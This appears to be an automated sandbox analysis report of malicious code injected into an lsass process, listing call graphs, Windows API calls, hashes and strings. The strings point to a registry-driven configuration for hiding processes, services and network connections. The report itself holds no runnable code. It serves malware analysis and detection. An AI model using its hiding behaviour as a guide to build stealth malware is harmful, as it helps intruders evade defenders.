                                                                                execution_graph 14899 140adfc273c 14901 140adfc276a 14899->14901 14900 140adfc2858 LoadLibraryA 14900->14901 14901->14900 14902 140adfc28d4 14901->14902 14903 140ae86202c 14905 140ae86205d 14903->14905 14904 140ae86213e 14905->14904 14906 140ae862173 14905->14906 14912 140ae862081 14905->14912 14907 140ae8621e7 14906->14907 14908 140ae862178 14906->14908 14907->14904 14911 140ae862f04 7 API calls 14907->14911 14921 140ae862f04 GetProcessHeap 14908->14921 14910 140ae8620b9 StrCmpNIW 14910->14912 14911->14904 14912->14904 14912->14910 14914 140ae861bf4 14912->14914 14915 140ae861c8b Concurrency::details::SchedulerProxy::DeleteThis 14914->14915 14916 140ae861c1b GetProcessHeap 14914->14916 14915->14912 14918 140ae861c41 __std_exception_copy 14916->14918 14917 140ae861c77 GetProcessHeap 14917->14915 14918->14915 14918->14917 14928 140ae86152c 14918->14928 14926 140ae862f40 __std_exception_copy 14921->14926 14922 140ae863015 GetProcessHeap 14923 140ae863029 Concurrency::details::SchedulerProxy::DeleteThis 14922->14923 14923->14904 14924 140ae863010 14924->14922 14925 140ae862fa2 StrCmpNIW 14925->14926 14926->14922 14926->14924 14926->14925 14927 140ae861bf4 4 API calls 14926->14927 14927->14926 14929 140ae86157c 14928->14929 14932 140ae861546 14928->14932 14929->14917 14930 140ae861565 StrCmpW 14930->14932 14931 140ae86155d StrCmpIW 14931->14932 14932->14929 14932->14930 14932->14931 14933 140ae861abc 14939 140ae861628 GetProcessHeap 14933->14939 14935 140ae861ad2 Sleep SleepEx 14937 140ae861acb 14935->14937 14937->14935 14938 140ae861598 StrCmpIW StrCmpW 14937->14938 14984 140ae8618b4 14937->14984 14938->14937 14940 140ae861648 __std_exception_copy 14939->14940 15001 140ae861268 GetProcessHeap 14940->15001 14942 140ae861650 14943 140ae861268 2 API calls 14942->14943 14944 140ae861661 14943->14944 14945 140ae861268 2 API calls 14944->14945 14946 140ae86166a 14945->14946 14947 140ae861268 2 API calls 14946->14947 14948 140ae861673 14947->14948 14949 140ae86168e RegOpenKeyExW 14948->14949 14950 140ae8618a6 14949->14950 14951 140ae8616c0 RegOpenKeyExW 14949->14951 14950->14937 14952 140ae8616ff RegOpenKeyExW 14951->14952 14953 140ae8616e9 14951->14953 14955 140ae861723 14952->14955 14956 140ae86173a RegOpenKeyExW 14952->14956 15005 140ae8612bc RegQueryInfoKeyW 14953->15005 15016 140ae86104c RegQueryInfoKeyW 14955->15016 14959 140ae861775 RegOpenKeyExW 14956->14959 14960 140ae86175e 14956->14960 14957 140ae8616f5 RegCloseKey 14957->14952 14961 140ae8617b0 RegOpenKeyExW 14959->14961 14962 140ae861799 14959->14962 14964 140ae8612bc 11 API calls 14960->14964 14966 140ae8617d4 14961->14966 14967 140ae8617eb RegOpenKeyExW 14961->14967 14965 140ae8612bc 11 API calls 14962->14965 14968 140ae86176b RegCloseKey 14964->14968 14969 140ae8617a6 RegCloseKey 14965->14969 14970 140ae8612bc 11 API calls 14966->14970 14971 140ae861826 RegOpenKeyExW 14967->14971 14972 140ae86180f 14967->14972 14968->14959 14969->14961 14973 140ae8617e1 RegCloseKey 14970->14973 14975 140ae861861 RegOpenKeyExW 14971->14975 14976 140ae86184a 14971->14976 14974 140ae86104c 4 API calls 14972->14974 14973->14967 14979 140ae86181c RegCloseKey 14974->14979 14977 140ae861885 14975->14977 14978 140ae86189c RegCloseKey 14975->14978 14980 140ae86104c 4 API calls 14976->14980 14981 140ae86104c 4 API calls 14977->14981 14978->14950 14979->14971 14982 140ae861857 RegCloseKey 14980->14982 14983 140ae861892 RegCloseKey 14981->14983 14982->14975 14983->14978 15023 140ae8614a4 14984->15023 15022 140ae876168 15001->15022 15003 140ae861283 GetProcessHeap 15004 140ae8612ae __std_exception_copy 15003->15004 15004->14942 15006 140ae861327 GetProcessHeap 15005->15006 15007 140ae86148a Concurrency::details::SchedulerProxy::DeleteThis 15005->15007 15013 140ae86133e __std_exception_copy Concurrency::details::SchedulerProxy::DeleteThis 15006->15013 15007->14957 15008 140ae861476 GetProcessHeap 15008->15007 15009 140ae861352 RegEnumValueW 15009->15013 15010 140ae86152c 2 API calls 15010->15013 15011 140ae8613d3 GetProcessHeap 15011->15013 15012 140ae86141e lstrlenW GetProcessHeap 15012->15013 15013->15008 15013->15009 15013->15010 15013->15011 15013->15012 15014 140ae8613f3 GetProcessHeap 15013->15014 15015 140ae861443 StrCpyW 15013->15015 15014->15013 15015->15013 15017 140ae8611b5 RegCloseKey 15016->15017 15018 140ae8610bf __std_exception_copy Concurrency::details::SchedulerProxy::DeleteThis 15016->15018 15017->14956 15018->15017 15019 140ae8610cf RegEnumValueW 15018->15019 15020 140ae86114e GetProcessHeap 15018->15020 15021 140ae86116e GetProcessHeap 15018->15021 15019->15018 15020->15018 15021->15018 15024 140ae8614e1 GetProcessHeap 15023->15024 15025 140ae8614c1 GetProcessHeap 15023->15025 15029 140ae876180 15024->15029 15026 140ae8614da Concurrency::details::SchedulerProxy::DeleteThis 15025->15026 15026->15024 15026->15025 15030 140ae876182 15029->15030 15031 140ae86253c 15033 140ae8625bb 15031->15033 15032 140ae8627aa 15033->15032 15034 140ae86261d GetFileType 15033->15034 15035 140ae862641 15034->15035 15036 140ae86262b StrCpyW 15034->15036 15047 140ae861a40 GetFinalPathNameByHandleW 15035->15047 15037 140ae862650 15036->15037 15041 140ae86265a 15037->15041 15045 140ae8626ff 15037->15045 15040 140ae863844 StrCmpNIW 15040->15045 15041->15032 15052 140ae863844 15041->15052 15055 140ae863044 StrCmpIW 15041->15055 15059 140ae861cac 15041->15059 15044 140ae863044 4 API calls 15044->15045 15045->15032 15045->15040 15045->15044 15046 140ae861cac 2 API calls 15045->15046 15046->15045 15048 140ae861a6a StrCmpNIW 15047->15048 15049 140ae861aa9 15047->15049 15048->15049 15050 140ae861a84 lstrlenW 15048->15050 15049->15037 15050->15049 15051 140ae861a96 StrCpyW 15050->15051 15051->15049 15053 140ae863851 StrCmpNIW 15052->15053 15054 140ae863866 15052->15054 15053->15054 15054->15041 15056 140ae863076 StrCpyW StrCatW 15055->15056 15057 140ae86308d PathCombineW 15055->15057 15058 140ae863096 15056->15058 15057->15058 15058->15041 15060 140ae861cc3 15059->15060 15062 140ae861ccc 15059->15062 15061 140ae86152c 2 API calls 15060->15061 15061->15062 15062->15041

                                                                                Executed Functions

                                                                                Function 00000140AE86253C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 5 140ae86253c-140ae8625c0 call 140ae882cc0 8 140ae8625c6-140ae8625c9 5->8 9 140ae8627d8-140ae8627fb 5->9 8->9 10 140ae8625cf-140ae8625dd 8->10 10->9 11 140ae8625e3-140ae862629 call 140ae868c60 * 3 GetFileType 10->11 18 140ae862641-140ae86264b call 140ae861a40 11->18 19 140ae86262b-140ae86263f StrCpyW 11->19 20 140ae862650-140ae862654 18->20 19->20 22 140ae8626ff-140ae862704 20->22 23 140ae86265a-140ae862673 call 140ae8630a8 call 140ae863844 20->23 24 140ae862707-140ae86270c 22->24 36 140ae862675-140ae8626a4 call 140ae8630a8 call 140ae863044 call 140ae861cac 23->36 37 140ae8626aa-140ae8626f4 call 140ae882cc0 23->37 26 140ae86270e-140ae862711 24->26 27 140ae862729 24->27 26->27 29 140ae862713-140ae862716 26->29 31 140ae86272c-140ae862745 call 140ae8630a8 call 140ae863844 27->31 29->27 32 140ae862718-140ae86271b 29->32 47 140ae862787-140ae862789 31->47 48 140ae862747-140ae862776 call 140ae8630a8 call 140ae863044 call 140ae861cac 31->48 32->27 35 140ae86271d-140ae862720 32->35 35->27 39 140ae862722-140ae862727 35->39 36->9 36->37 37->9 49 140ae8626fa 37->49 39->27 39->31 50 140ae8627aa-140ae8627ad 47->50 51 140ae86278b-140ae8627a5 47->51 48->47 68 140ae862778-140ae862783 48->68 49->23 54 140ae8627b7-140ae8627ba 50->54 55 140ae8627af-140ae8627b5 50->55 51->24 58 140ae8627d5 54->58 59 140ae8627bc-140ae8627bf 54->59 55->9 58->9 59->58 63 140ae8627c1-140ae8627c4 59->63 63->58 65 140ae8627c6-140ae8627c9 63->65 65->58 67 140ae8627cb-140ae8627ce 65->67 67->58 69 140ae8627d0-140ae8627d3 67->69 68->9 70 140ae862785 68->70 69->9 69->58 70->24
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.3386134452.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: FileType
                                                                                • String ID: \\.\pipe\
                                                                                • API String ID: 3081899298-91387939
                                                                                • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                                • Instruction ID: 006047059f567fc424369bd4eaabb636d5541b44e56c09e15fbbbd16066aee87
                                                                                • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                                • Instruction Fuzzy Hash: 6E71173624078185EB26DF2BD8407EAA790F38D7A4F640126DF0D5BBA9DE34CE45C382
                                                                                Function 00000140AE86202C Relevance: 4.7, APIs: 1, Strings: 2, Instructions: 162COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 71 140ae86202c-140ae862057 call 140ae882d00 73 140ae86205d-140ae862066 71->73 74 140ae86206f-140ae862072 73->74 75 140ae862068-140ae86206c 73->75 76 140ae862223-140ae862243 74->76 77 140ae862078-140ae86207b 74->77 75->74 78 140ae862173-140ae862176 77->78 79 140ae862081-140ae862093 77->79 81 140ae8621e7-140ae8621ea 78->81 82 140ae862178-140ae862192 call 140ae862f04 78->82 79->76 80 140ae862099-140ae8620a5 79->80 83 140ae8620a7-140ae8620b7 80->83 84 140ae8620d3-140ae8620de call 140ae861bbc 80->84 81->76 85 140ae8621ec-140ae8621ff call 140ae862f04 81->85 82->76 94 140ae862198-140ae8621ae 82->94 83->84 87 140ae8620b9-140ae8620d1 StrCmpNIW 83->87 91 140ae8620ff-140ae862111 84->91 96 140ae8620e0-140ae8620f8 call 140ae861bf4 84->96 85->76 95 140ae862201-140ae862209 85->95 87->84 87->91 97 140ae862113-140ae862115 91->97 98 140ae862121-140ae862123 91->98 94->76 99 140ae8621b0-140ae8621cc 94->99 95->76 100 140ae86220b-140ae862213 95->100 96->91 113 140ae8620fa-140ae8620fd 96->113 102 140ae862117-140ae86211a 97->102 103 140ae86211c-140ae86211f 97->103 104 140ae862125-140ae862128 98->104 105 140ae86212a 98->105 106 140ae8621d0-140ae8621e3 99->106 109 140ae862216-140ae862221 100->109 107 140ae86212d-140ae862130 102->107 103->107 104->107 105->107 106->106 108 140ae8621e5 106->108 111 140ae862132-140ae862138 107->111 112 140ae86213e-140ae862141 107->112 108->76 109->76 109->109 111->80 111->112 112->76 114 140ae862147-140ae86214b 112->114 113->107 115 140ae862162-140ae86216e 114->115 116 140ae86214d-140ae862150 114->116 115->76 116->76 117 140ae862156-140ae86215b 116->117 117->114 118 140ae86215d 117->118 118->76
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.3386134452.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocFree
                                                                                • String ID: S$dialer
                                                                                • API String ID: 756756679-3873981283
                                                                                • Opcode ID: 10a6181ad89868b013f95f8d430f86fb0b73c76b57149a1256a42c526e771eaa
                                                                                • Instruction ID: 6995ce01178be5ec7128772deebd1550e485b351504c4b94060f668f1040f1af
                                                                                • Opcode Fuzzy Hash: 10a6181ad89868b013f95f8d430f86fb0b73c76b57149a1256a42c526e771eaa
                                                                                • Instruction Fuzzy Hash: 6E51BE32B5572486EB62CB2BA8406EDA3F5F7087A4F249451DF0D13BA5DB35DC91C382
                                                                                Function 00000140AE861A40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.3386134452.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: FinalHandleNamePathlstrlen
                                                                                • String ID: \\?\
                                                                                • API String ID: 2719912262-4282027825
                                                                                • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                                • Instruction ID: c3158435ef4687b1766e3257663a9035ab9b0d40d8f3ba1c44d0f0f8ec37f8a1
                                                                                • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                                • Instruction Fuzzy Hash: 7DF03C3274474192EB618B22E9847996760F74CBE9FA44020DF4D47979DE3DCA8DCB41
                                                                                Function 00000140AE86328C Relevance: 4.5, APIs: 3, Instructions: 43threadCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.3386134452.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                                • String ID:
                                                                                • API String ID: 1683269324-0
                                                                                • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                                • Instruction ID: 3ba806e3e51b1b0dcb359024cf54f050519727a8cf8c5b8b8f5a43b5e8428739
                                                                                • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                                • Instruction Fuzzy Hash: BA115E30A9478082F7639B23B9153D922D4B79C765FB041249F4E875B1EF78C844C2C2
                                                                                Function 00000140AE861ABC Relevance: 3.1, APIs: 2, Instructions: 68sleepCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                  • Part of subcall function 00000140AE861628: GetProcessHeap.KERNEL32 ref: 00000140AE861633
                                                                                  • Part of subcall function 00000140AE861628: HeapAlloc.KERNEL32 ref: 00000140AE861642
                                                                                  • Part of subcall function 00000140AE861628: RegOpenKeyExW.ADVAPI32 ref: 00000140AE8616B2
                                                                                  • Part of subcall function 00000140AE861628: RegOpenKeyExW.ADVAPI32 ref: 00000140AE8616DF
                                                                                  • Part of subcall function 00000140AE861628: RegCloseKey.ADVAPI32 ref: 00000140AE8616F9
                                                                                  • Part of subcall function 00000140AE861628: RegOpenKeyExW.ADVAPI32 ref: 00000140AE861719
                                                                                  • Part of subcall function 00000140AE861628: RegCloseKey.ADVAPI32 ref: 00000140AE861734
                                                                                  • Part of subcall function 00000140AE861628: RegOpenKeyExW.ADVAPI32 ref: 00000140AE861754
                                                                                  • Part of subcall function 00000140AE861628: RegCloseKey.ADVAPI32 ref: 00000140AE86176F
                                                                                  • Part of subcall function 00000140AE861628: RegOpenKeyExW.ADVAPI32 ref: 00000140AE86178F
                                                                                  • Part of subcall function 00000140AE861628: RegCloseKey.ADVAPI32 ref: 00000140AE8617AA
                                                                                  • Part of subcall function 00000140AE861628: RegOpenKeyExW.ADVAPI32 ref: 00000140AE8617CA
                                                                                • Sleep.KERNEL32 ref: 00000140AE861AD7
                                                                                • SleepEx.KERNELBASE ref: 00000140AE861ADD
                                                                                  • Part of subcall function 00000140AE861628: RegCloseKey.ADVAPI32 ref: 00000140AE8617E5
                                                                                  • Part of subcall function 00000140AE861628: RegOpenKeyExW.ADVAPI32 ref: 00000140AE861805
                                                                                  • Part of subcall function 00000140AE861628: RegCloseKey.ADVAPI32 ref: 00000140AE861820
                                                                                  • Part of subcall function 00000140AE861628: RegOpenKeyExW.ADVAPI32 ref: 00000140AE861840
                                                                                  • Part of subcall function 00000140AE861628: RegCloseKey.ADVAPI32 ref: 00000140AE86185B
                                                                                  • Part of subcall function 00000140AE861628: RegOpenKeyExW.ADVAPI32 ref: 00000140AE86187B
                                                                                  • Part of subcall function 00000140AE861628: RegCloseKey.ADVAPI32 ref: 00000140AE861896
                                                                                  • Part of subcall function 00000140AE861628: RegCloseKey.ADVAPI32 ref: 00000140AE8618A0
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.3386134452.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                                • String ID:
                                                                                • API String ID: 1534210851-0
                                                                                • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                                • Instruction ID: 326f40d2db6ff263f8e0a940b391fb73a78b65f37836ebd93bce5d4d1fbe3847
                                                                                • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                                • Instruction Fuzzy Hash: 2631CC7128074181FF529B27DA513E963A5AB8CBE4F2858219F1E877B7EF34CC51C292
                                                                                Function 00000140ADFC273C Relevance: 1.7, APIs: 1, Instructions: 187libraryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 176 140adfc273c-140adfc27a4 call 140adfc29d4 * 4 185 140adfc27aa-140adfc27ad 176->185 186 140adfc29b2 176->186 185->186 188 140adfc27b3-140adfc27b6 185->188 187 140adfc29b4-140adfc29d0 186->187 188->186 189 140adfc27bc-140adfc27bf 188->189 189->186 190 140adfc27c5-140adfc27e6 189->190 190->186 192 140adfc27ec-140adfc280c 190->192 193 140adfc280e-140adfc2836 192->193 194 140adfc2838-140adfc283f 192->194 193->193 193->194 195 140adfc28df-140adfc28e6 194->195 196 140adfc2845-140adfc2852 194->196 198 140adfc28ec-140adfc2901 195->198 199 140adfc2992-140adfc29b0 195->199 196->195 197 140adfc2858-140adfc286a LoadLibraryA 196->197 200 140adfc286c-140adfc2878 197->200 201 140adfc28ca-140adfc28d2 197->201 198->199 202 140adfc2907 198->202 199->187 204 140adfc28c5-140adfc28c8 200->204 201->197 205 140adfc28d4-140adfc28d9 201->205 203 140adfc290d-140adfc2921 202->203 207 140adfc2982-140adfc298c 203->207 208 140adfc2923-140adfc2934 203->208 204->201 209 140adfc287a-140adfc287d 204->209 205->195 207->199 207->203 210 140adfc293f-140adfc2943 208->210 211 140adfc2936-140adfc293d 208->211 212 140adfc287f-140adfc28a5 209->212 213 140adfc28a7-140adfc28b7 209->213 216 140adfc294d-140adfc2951 210->216 217 140adfc2945-140adfc294b 210->217 215 140adfc2970-140adfc2980 211->215 218 140adfc28ba-140adfc28c1 212->218 213->218 215->207 215->208 219 140adfc2963-140adfc2967 216->219 220 140adfc2953-140adfc2961 216->220 217->215 218->204 219->215 222 140adfc2969-140adfc296c 219->222 220->215 222->215
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.3377815584.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_140adfc0000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID:
                                                                                • API String ID: 1029625771-0
                                                                                • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                                • Instruction ID: 06fb5e1ef4416040f010e1a7d6ba73e71e6e03eebacef6a42692c0d9d5c867cd
                                                                                • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                                • Instruction Fuzzy Hash: 10610732B2179887DB65CF1690407AE7393FB58B98F688121DF5907BD4DA38D863E700

                                                                                Non-executed Functions

                                                                                Function 00000140AE862B2C Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264stringlibraryloaderCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 484 140ae862b2c-140ae862ba5 call 140ae882ce0 487 140ae862ee0-140ae862f03 484->487 488 140ae862bab-140ae862bb1 484->488 488->487 489 140ae862bb7-140ae862bba 488->489 489->487 490 140ae862bc0-140ae862bc3 489->490 490->487 491 140ae862bc9-140ae862bd9 GetModuleHandleA 490->491 492 140ae862bed 491->492 493 140ae862bdb-140ae862beb call 140ae876090 491->493 495 140ae862bf0-140ae862c0e 492->495 493->495 495->487 498 140ae862c14-140ae862c33 StrCmpNIW 495->498 498->487 499 140ae862c39-140ae862c3d 498->499 499->487 500 140ae862c43-140ae862c4d 499->500 500->487 501 140ae862c53-140ae862c5a 500->501 501->487 502 140ae862c60-140ae862c73 501->502 503 140ae862c75-140ae862c81 502->503 504 140ae862c83 502->504 505 140ae862c86-140ae862c8a 503->505 504->505 506 140ae862c8c-140ae862c98 505->506 507 140ae862c9a 505->507 508 140ae862c9d-140ae862ca7 506->508 507->508 509 140ae862d9d-140ae862da1 508->509 510 140ae862cad-140ae862cb0 508->510 511 140ae862da7-140ae862daa 509->511 512 140ae862ed2-140ae862eda 509->512 513 140ae862cc2-140ae862ccc 510->513 514 140ae862cb2-140ae862cbf call 140ae86199c 510->514 515 140ae862dac-140ae862db8 call 140ae86199c 511->515 516 140ae862dbb-140ae862dc5 511->516 512->487 512->502 518 140ae862d00-140ae862d0a 513->518 519 140ae862cce-140ae862cdb 513->519 514->513 515->516 523 140ae862dc7-140ae862dd4 516->523 524 140ae862df5-140ae862df8 516->524 520 140ae862d0c-140ae862d19 518->520 521 140ae862d3a-140ae862d3d 518->521 519->518 526 140ae862cdd-140ae862cea 519->526 520->521 527 140ae862d1b-140ae862d28 520->527 528 140ae862d3f-140ae862d49 call 140ae861bbc 521->528 529 140ae862d4b-140ae862d58 lstrlenW 521->529 523->524 531 140ae862dd6-140ae862de3 523->531 532 140ae862e05-140ae862e12 lstrlenW 524->532 533 140ae862dfa-140ae862e03 call 140ae861bbc 524->533 534 140ae862ced-140ae862cf3 526->534 539 140ae862d2b-140ae862d31 527->539 528->529 535 140ae862d93-140ae862d98 528->535 541 140ae862d5a-140ae862d64 529->541 542 140ae862d7b-140ae862d8d call 140ae863844 529->542 543 140ae862de6-140ae862dec 531->543 537 140ae862e14-140ae862e1e 532->537 538 140ae862e35-140ae862e3f call 140ae863844 532->538 533->532 554 140ae862e4a-140ae862e55 533->554 534->535 536 140ae862cf9-140ae862cfe 534->536 547 140ae862e42-140ae862e44 535->547 536->518 536->534 537->538 548 140ae862e20-140ae862e33 call 140ae86152c 537->548 538->547 539->535 549 140ae862d33-140ae862d38 539->549 541->542 552 140ae862d66-140ae862d79 call 140ae86152c 541->552 542->535 542->547 553 140ae862dee-140ae862df3 543->553 543->554 547->512 547->554 548->538 548->554 549->521 549->539 552->535 552->542 553->524 553->543 558 140ae862e57-140ae862e5b 554->558 559 140ae862ecc-140ae862ed0 554->559 562 140ae862e63-140ae862e7d call 140ae8685c0 558->562 563 140ae862e5d-140ae862e61 558->563 559->512 565 140ae862e80-140ae862e83 562->565 563->562 563->565 567 140ae862ea6-140ae862ea9 565->567 568 140ae862e85-140ae862ea3 call 140ae8685c0 565->568 567->559 571 140ae862eab-140ae862ec9 call 140ae8685c0 567->571 568->567 571->559
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.3386134452.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                                • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                                • API String ID: 2119608203-3850299575
                                                                                • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                                • Instruction ID: bf2ef32ac57e5f465ce725a7a74baab9ea04f71ed1d086599ba6561ce8fa9f42
                                                                                • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                                • Instruction Fuzzy Hash: 2AB19E72250B5486EB668F2BD4407E9A3A5FB48BA4F645066EF4D53BB5DF34CC40C382
                                                                                Function 00000140AE867D90 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.3386134452.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                • String ID:
                                                                                • API String ID: 3140674995-0
                                                                                • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                                • Instruction ID: 1503c4d1f0e9a2face0525283fdd9087e61cbfeab21d2c89dc1035b309a16709
                                                                                • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                                • Instruction Fuzzy Hash: 2131A372245B808AEB618F61E8407ED7361F788754F64442ADF4D47BA8EF38C948C790
                                                                                Function 00000140AE86D2A4 Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.3386134452.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                • String ID:
                                                                                • API String ID: 1239891234-0
                                                                                • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                                • Instruction ID: f4b3617ef55b8c279f228a1357564ad9138b4f9cc27f1e8a361b5862f6d2fb0c
                                                                                • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                                • Instruction Fuzzy Hash: 9C314E32654B8086EB619F26E8403DE73A4F789764F600125EF9D47BB8EF38C945CB81
                                                                                Function 00000140AE861628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.3386134452.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                                • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                                • API String ID: 106492572-2879589442
                                                                                • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                                • Instruction ID: 4cb465b735a6020238bf1ea048d5c89955278629e63a0cab2664c088472f563d
                                                                                • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                                • Instruction Fuzzy Hash: 5771E736750B10C6EB129F66E8906D933A5FB89BA8F201121DF4E97B79DF38C844C781
                                                                                Function 00000140AE8612BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.3386134452.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                                • String ID: d
                                                                                • API String ID: 2005889112-2564639436
                                                                                • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                                • Instruction ID: eaf29793312f880262aa33c4d225e9377ef8ac7c3781aeeffa93a87445d713dc
